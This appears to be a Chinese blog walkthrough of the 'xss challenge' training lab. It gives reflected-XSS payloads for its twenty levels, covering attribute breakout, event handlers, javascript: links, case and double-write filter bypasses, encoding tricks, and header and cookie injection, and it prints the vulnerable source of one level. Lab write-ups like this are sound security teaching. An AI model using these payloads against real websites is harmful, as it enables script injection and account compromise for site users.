- 1Android Sensor HAL层分析_sensor hal service
- 2git提交后冲突的解决办法_git push冲突怎么解决
- 3软件测试最新一个资深测试工程师面试一来就问我这些题目_三十位真实乱口述(3),2024年最新腾讯软件测试面经
- 4Typora+PicGo+Gitee环境搭建(windows)(需要的软件下载打包在一起了)_picgo设置gitee
- 5基于AI的智能聊天机器人ChatTTS,自然语言处理和机器学习技术的完美结合!_基于tts的智能聊天机器人
- 6mysql set 命令的用法_mysql命令用法复习笔记
- 7数据库---索引和事务_事务,索引,主键
- 8LLM漫谈(三)| 使用Chainlit和LangChain构建文档问答的LLM应用程序
- 9汽车软件开发中如何应用敏捷框架_汽车软件敏捷开发,2024必看-Golang高级面试题总结_敏捷开发 汽车软件
- 10实现基本数据结构之链表_数组模拟栈效率
050 XSS通关小游戏——xss challenge_xss闯关小游戏
赞
踩
一:下载与部署
xss challenge是个有关反射型xss的测试通关挑战,一共有20关。
下载地址:xss challenge
(访问密码:donMkh)
下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可
二:通关过程
这个是我自己的通关方法,不一定很准确
首页
level-01 没有任何机制
点击首页图片进入第一关,发现修改name的值,页面的显示也随之改变,这里我们首先直接试试<script>alert(/xss/)<script>,发现直接alert弹窗,过关。
命令:http://10.157.14.169/xss-labs-master/level1.php ?name=<script>alert(/xss/)</script>
level-02 双引号闭合标签
先随便输入,发现跟着变化
然后试试<script>alert(/xss/)</script>,发现输入的内容会被直接显示在页面中,这说明这段JS代码没有起作用,只是当作纯字符给输出到页面了。
右键页面查看源码:
发现尖括号都被转义成<和>了,导致浏览器无法识别script标签。那我们要想让script生效。怎么办?
由上图可以看出,第一个红框的内容就是input标签内的value值,我们就可以在input标签上做文章,先把input标签用">给闭合掉。
所以http://10.157.14.169/xss-labs-master/level2.php ?keyword="><script>alert(/xss/)</script>
level-03 单引号闭合标签+html事件
进入第三关,发现keyword变成了writing了
我们点击搜索试试看,又变回keyword
我们就直接在hackbar里面修改为?keyword,然后试试?keyword=<script>alert(/xss/)</script>
发现没啥用。
右键打开页面源码,发现无论是h2标签的值,还是input的value值都被转义了,那是不是可以试试第二关的方法用'>闭合input标签呢,试了下发现没用,因为第二关的value值没有被转义。
那现在我们进入xss-labs-master(就是复制到www目录下的)文件夹,找到level3.php文件,打开看看。
发现有一个htmlspecialchars函数。百度一下这个函数。这里我截图下来了。
然后上述level3.php代码.htmlspecialchars($str).这说明,< >都变成了html实体,也就是说,只是一个纯粹的< 和 >字符。并且.htmlspecialchars($str).外部还有双引号包裹,说明还过滤了双引号。
这里我们就可以考虑用html事件,事件的使用可以参考上一节内容。
这里用onmouseover='alert(/xss/)',上面分析得到过滤了双引号,所以单引号
http://10.157.14.169/xss-labs-master/level3.php?keyword='onmouseover='alert(/xss/)'
level-04 双引号闭合标签+html事件
尝试<script>alert(/xss/)</script>发现不行,觉得应该用"><script>alert(/xss/)</script>
发现都被转义了,那我们和上一关一样,考虑事件,这次使用双引号。"onmouseover='alert(/xss/)'
level-05 伪协议
还是一样的,首先尝试<script>alert(/xss/)</script>
发现不行,右键打开网页源码。
发现script被强行改成scr_ipt,参考上一节内容,有点像xss的变形。
我们查看源代码level5.php
发现进行了变形处理。此处只是针对<script>和on,后者表示onmouseover事件也不能用了,因为on会被替换为o_n
这时候,我们可以考虑伪协议,发下a标签没有被使用。
所以"><a href="javascript:alert(/xss/)">click me</a>
level-06 xss变形,大小写绕过
尝试了<script>alert(/xss/)</script>,"><script>alert(/xss/)</script>,?keyword="onmouseover='alert(/xss/)'均被替换了,如下图
然后http://10.157.14.169/xss-labs-master/level6.php?keyword="<a href="javascript:alert(/xss/)">click me</a>
发现也不行
那么我们考虑XSS变形,比如替换大小写之类的。并且让input标签闭合
?keyword="><a hREf="javascript:alert(/xss/)">click me</a>
这里我们可以查看level6.php源码
发现只做了 分隔字符 的过滤。
level-07 双写绕过
上面的方法都试了,发下on,script,href,src会消失,查看了level07.php源码,发现果然如此:
然后又依次试过了制表符,空格,还有字母转十进制编码,以及十六进制编码,发现都不行。
然后又重新看了下上一节内容的笔记,结合源码中,会把整个关键字(比如script on src data href)给替换为空,那么就可以试试双写绕过。然后就用了如下代码:
<scr<script>ipt>alert(/xss/)</scr<script>ipt>
执行后,发现不成功,然后右键查看页面源码
发现多了一对尖括号,所以直接去掉尖括号,成功闯关
http://10.157.14.169/xss-labs-master/level7.php?keyword="><scrscriptipt>alert(/xss/)</scrscriptipt>
level-08 自己试了没有成功,后续再补充
没有解决,没看懂,网上也有大佬解出来了,但是我直接复制过来,我这边都弄不出来。不知道什么问题导致的?
这是level8.php源码:
<!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.location.href="level9.php?keyword=not bad!"; } </script> <title>欢迎来到level8</title> </head> <body> <h1 align=center>欢迎来到level8</h1> <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); echo '<center> <form action=level8.php method=GET> <input name=keyword value="'.htmlspecialchars($str).'"> <input type=submit name=submit value=添加友情链接 /> </form> </center>'; ?> <?php echo '<center><BR><a href="'.$str7.'">友情链接</a></center>'; ?> <center><img src=level8.jpg></center> <?php echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>"; ?> </body> </html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
从上述源码中可以看出大小写,双引号,也过滤了,前面关,用过的也都不起作用。
看到有个a标签,我们可以考虑伪协议 + 字符编码。
先不编码:payload:javascript:alert(/xss/)
发现ri替换为r_i,
接下来考虑字符编码
这里有个字符实体转码的网站:点我
所以我们可以构造payload:?keyword=javascript:alert(/xss/)
页面代码:
我没成功,但是别人的可以,不知道为啥了?????????????
网上的成功图:
--------------可以先用取巧的方法跳过这一关,进入下一关-------------
补充:level08-20
8: 在输入框中输入,javascript:alert(1)的unicode的编码,编码网址:https://www.matools.com/app/unicode javascript:alert(1) 9: 因为有个strpos函数,会获取字符中是否有http:// payload1:javascript:alert(1)/*http://*/ payload2:javascript:alert('xsshttp://') 10 把鼠标移动到输入框上 http://127.0.0.1/xss-labs-master/level10.php?t_sort=1" onmousemove="javascript:alert(1)" type="text" 11 F12查看,更改type的属性为text,t_ref输入框内输入123,然后回车,框内的值会变成http://127.0.0.1/xss-labs-master/level11.php?t_link=&t_history=&t_sort=&t_ref=123 得到的是浏览器的HTTP_REFERER 那么可以构造HTTP_REFERER的payload:利用hackbar工具,勾选Referer的选项,输入" onmouseover="javascript:alert()" type="text" 12 与11 类似,F12查看,更改type的属性为text,t_ua输入框内输入123,只不过把HTTP_REFERER替换成HTTP_USER_AGENT,与上同样的方法,利用hackbar工具,勾选User Agent的选项, 输入" onmousemove="javascript:alert()" type="text" 13 与12类似,可以直接查看源码,发现是对cookie相关的注入。所以打开浏览器F12选择存储,更改cookie的值," onmouseover="javascript:alert()" type="text",然后刷新页面即可 14 参考文章: https://www.freebuf.com/articles/web/282983.html 15 http://127.0.0.1/xss-labs-master/level15.php?src='../../level1.php?name=<img src=1 onmouseover=alert()>' 16 可以先输入关键字测试一波看看那些被屏蔽了?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> j 发现大写转小写了,script替换为空格了,F12可以看到空格变成实体字符 了,/也转空格了 空格可以用回车代替,回车的url编码为%0a,所以构造如下payload http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0asrc='x'%0aonerror='alert(1)'> 17 查看17关的PHP源码,发现有个src=xsf01.swf,swf文件是以前的旧浏览器的flash文件,但是现在浏览器基本都不支持了,所以,把源码修改改为src=index.png,并不影响。 有个<embed>标签,这个标签定义了一个容器,用来嵌入外部的应用程序等。现在不建议使用,一般使用<img><iframe><video><audio>等标签代替。构造如下payload http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=b onmouseover='alert(123);' 18 同上 http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=b onmouseover='alert(123);' 19 按照同上修改PHP文件,然后payload一下,发现并不能成功,因为在这一关的src=后面有个双引号,也就是说会把index.png?和你传入的值放在一起进行处理。又因为传入的值经过htmlspecialchars实体化处理, 所以无法闭合双引号。 先把index.png?恢复成原来的,然后参考大佬的文章:https://blog.csdn.net/u014029795/article/details/103213877 20 参考文章: https://blog.csdn.net/u014029795/article/details/103217680
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
